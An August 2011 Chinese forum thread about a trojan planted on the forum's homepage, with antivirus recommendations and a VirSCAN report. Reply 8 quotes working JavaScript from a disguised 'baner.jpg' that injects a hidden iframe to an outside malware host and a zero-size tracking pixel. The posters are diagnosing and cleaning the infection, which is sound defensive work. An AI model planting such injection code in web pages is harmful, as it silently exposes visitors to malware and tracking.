阅读:3475回复:17
论坛首页病毒处理!
近几日论坛首页又现病毒。但国内产各大杀软似乎都不能发现,本人机器上同时安装有江民KV2011和最新的“金山毒霸2012猎豹”,但它们均无反应。好在微软的免费杀毒软件比较牛,它不但能发现,而且还能清除!
补充说明: 微软的免费杀毒软件为Microsoft Security Essentials,简称MSE,有32位和64位两个版本,朋友们可以根据自己使用的操作系统选择对应版本下载。我6月份下载到的最新版本号为2.0.657.0,目前在线更新后 Security Essentials 版本号显示为2.1.1116.0,最好在微软官方网站去下载以确保安全。 |
|
2楼#
发布于:2011-08-18 11:26
此法的确有用,谢谢楼主!!
我已将软件上传到115共享,请大家使用:http://u.115.com/file/e6d176rz 经我实践,可以有效清除1楼所说木马,执行完后务必点击“清理计算机”,祝论坛好运! 微软免费杀毒软件官网下载地址:http://www.microsoft.com/zh-cn/security_essentials/default.aspx |
|
4楼#
发布于:2011-08-18 16:55
是的,的确有用,一进论坛,立刻报木马,而之前装的360却毫无反应,感谢楼主及踏雪MM
|
|
5楼#
发布于:2011-08-18 17:04
没事,不用客气,要特别感谢cqduron,我看到帖子后马上搜索了两个版本的微软免费杀毒软件,试用后上传了行之有效的那一款,只恐也是治标不治本啊。截止我现在回帖时、论坛仍有木马,请大家务必小心!
版务突然来了许多灌水帖,为让大家及时看到杀毒软件并下载,本帖提前24小时! |
|
7楼#
发布于:2011-08-18 22:12
踏雪说得没错,我也试用了此软件,虽然查杀了个别软件中的病毒,但360依旧不断报告论坛挂码,存在风险。
|
|
|
8楼#
发布于:2011-08-18 23:21
h*ttp://en.chinatcs.com/Foosun/Admin/Mall/Comm/baner.jpg 这个jpg图片不是图片,是文本文件,内容如下:
function Get(){ var Then = new Date() Then.setTime(Then.getTime() + 24*60*60*1000) var cookieString = new String(document.cookie) var cookieHeader = "Cookie1=" var beginPosition = cookieString.indexOf(cookieHeader) if (beginPosition != -1){ } else { document.cookie = "Cookie1=risb;expires="+ Then.toGMTString() document.writeln("<iframe src=http://www.wrmetal.com/404/nb.html width=1000 height=0></iframe>") var a8699tf="51la";var a8699pu="";var a8699pf="51la";var a8699su=window.location;var a8699sf=document.referrer;var a8699of="";var a8699op="";var a8699ops=1;var a8699ot=1;var a8699d=new Date();var a8699color="";if (navigator.appName=="Netscape"){a8699color=screen.pixelDepth;} else {a8699color=screen.colorDepth;} try{a8699tf=top.document.referrer;}catch(e){} try{a8699pu =window.parent.location;}catch(e){} try{a8699pf=window.parent.document.referrer;}catch(e){} try{a8699ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a8699ops=(a8699ops==null)?1: (parseInt(unescape((a8699ops)[2]))+1);var a8699oe =new Date();a8699oe.setTime(a8699oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a8699ops+ ";path=/;expires="+a8699oe.toGMTString();a8699ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a8699ot==null){a8699ot=1;}else{a8699ot=parseInt(unescape((a8699ot)[2])); a8699ot=(a8699ops==1)?(a8699ot+1):(a8699ot);}a8699oe.setTime(a8699oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a8699ot+";path=/;expires="+a8699oe.toGMTString();}catch(e){} a8699of=a8699sf;if(a8699pf!=="51la"){a8699of=a8699pf;}if(a8699tf!=="51la"){a8699of=a8699tf;}a8699op=a8699pu;try{lainframe}catch(e){a8699op=a8699su;}document.write('<img style="width:0px;height:0px" src="http://web1.51.la:82/go.asp?svid=20;id=4548699;tpages='+a8699ops+';ttimes='+a8699ot+';tzone='+(0-a8699d.getTimezoneOffset()/60)+';tcolor='+a8699color+';sSize='+screen.width+','+screen.height+';referrer='+escape(a8699of)+';vpage='+escape(a8699op)+'" />'); } }Get(); 可能这个“图片”地址被植入本站网页代码中。 形式可能是:"<iframe src=http://en.chinatcs.com/Foosun/Admin/Mall/Comm/baner.jpg ...... ></iframe>" 或者彻底清除这个地址,或者与 h*ttp://en.chinatcs.com 这个网站联系,让他们删除这个“图片”文件? 可能是一种相互连环牵连的木马,希望早日清除。 把这个baner.jpg文件上传到virscan.org查毒,结果如下: VirSCAN.org Scanned Report : Scanned time : 2011/08/19 00:16:47 (CST) Scanner results:8%的杀软(3/37)报告发现病毒 File Name : baner.jpg File Size : 2016 byte File Type : ASCII text, with very long lines, with CRLF line terminators MD5 : e294f070a9b64417b910d1a21e59dba8 SHA1 : ca6a6f51f21ac6ce4de9258068d7a408d1ab052a Online report : http://r.virscan.org/4c8cc76906e373daf6571cb9b9768aa6 Scanner Engine Ver Sig Ver Sig Date Time Scan result a-squared 5.1.0.3 20110818060326 2011-08-18 0.31 - 安博士V3 2011.08.19.00 2011.08.19 2011-08-19 1.69 - AntiVir 8.2.6.32 7.11.13.123 2011-08-18 0.35 - 安天 2.0.18 20110804.11725727 2011-08-04 0.03 - Arcavir 2011 201107140423 2011-07-14 2.61 - Authentium 5.1.1 201108181303 2011-08-18 1.51 - AVAST! 4.7.4 110817-1 2011-08-17 0.04 - AVG 8.5.850 271.1.1/3842 2011-08-18 2.08 - BitDefender 7.90123.8932560 7.38652 2011-08-18 5.55 - ClamAV 0.97.1 13451 2011-08-18 0.01 - Comodo 5.1 9790 2011-08-18 3.39 - CP Secure 1.3.0.5 2011.08.18 2011-08-18 0.01 - Dr.Web 5.0.2.3300 2011.08.18 2011-08-18 21.18 - F-Prot 4.6.2.117 20110818 2011-08-18 3.83 - F-Secure 7.02.73807 2011.08.18.04 2011-08-18 0.18 Trojan.JS.Agent.aat [AVP] 飞塔 4.2.257 13.557 2011-08-17 0.27 - GData 22.1674 20110818 2011-08-18 0.17 - ViRobot 20110818 2011.08.18 2011-08-18 0.56 - Ikarus T3.1.32.20.0 2011.08.18.79123 2011-08-18 7.47 - 江民杀毒 13.0.900 2011.08.18 2011-08-18 1.59 - 卡巴斯基 5.5.10 2011.08.18 2011-08-18 0.66 Trojan.JS.Agent.aat 金山毒霸 2009.2.5.15 2011.8.18.18 2011-08-18 2.23 - 迈克菲 5400.1158 6441 2011-08-17 13.69 - Microsoft 1.7604 2011.08.18 2011-08-18 3.78 - NOD32 3.0.21 6389 2011-08-18 0.01 - Norman 6.07.10 6.07.00 2011-08-18 20.04 - 熊猫卫士 9.05.01 2011.08.18 2011-08-18 2.32 - 趋势科技 9.200-1012 8.360.11 2011-08-17 0.02 - Quick Heal 11.00 2011.08.18 2011-08-18 0.91 - 瑞星 20.0 23.71.03.03 2011-08-18 0.22 - Sophos 3.22.0 4.68 2011-08-18 4.07 - Sunbelt 3.9.2497.2 10200 2011-08-18 1.50 - 赛门铁克 1.3.0.24 20110817.002 2011-08-17 0.15 - nProtect 20110815.01 12426891 2011-08-15 2.05 - The Hacker 6.7.0.1 v00279 2011-08-17 0.53 - VBA32 3.12.16.4 20110817.1019 2011-08-17 4.21 Malware.HTML.Iframe (paranoid heuristics) (suspicious) VirusBuster 5.3.0.4 14.0.175.0/58962562011-08-18 0.04 - |
|
10楼#
发布于:2011-08-21 08:36
我用360同样能解决这问题。但要根本解决问题还是论坛本身的清理。
|
|
|
11楼#
发布于:2011-08-23 17:00
修好了!像这种鸟人真是防不胜防,不知道下回又出什么幺蛾子
|
|
|
12楼#
发布于:2011-08-23 17:11
回 12楼(zhangfan) 的帖子
回来的感觉真好,鄙视“鸟人”。 |
|
14楼#
发布于:2011-08-23 23:58
这么快就治好了,站长真辛苦啦,祝贺论坛恢复运营!
|
|
|
15楼#
发布于:2011-08-24 00:07
|
|
|
16楼#
发布于:2011-08-24 22:56
祝贺消木成功,为辛勤工作者摇旗,谢谢了!
|
|
|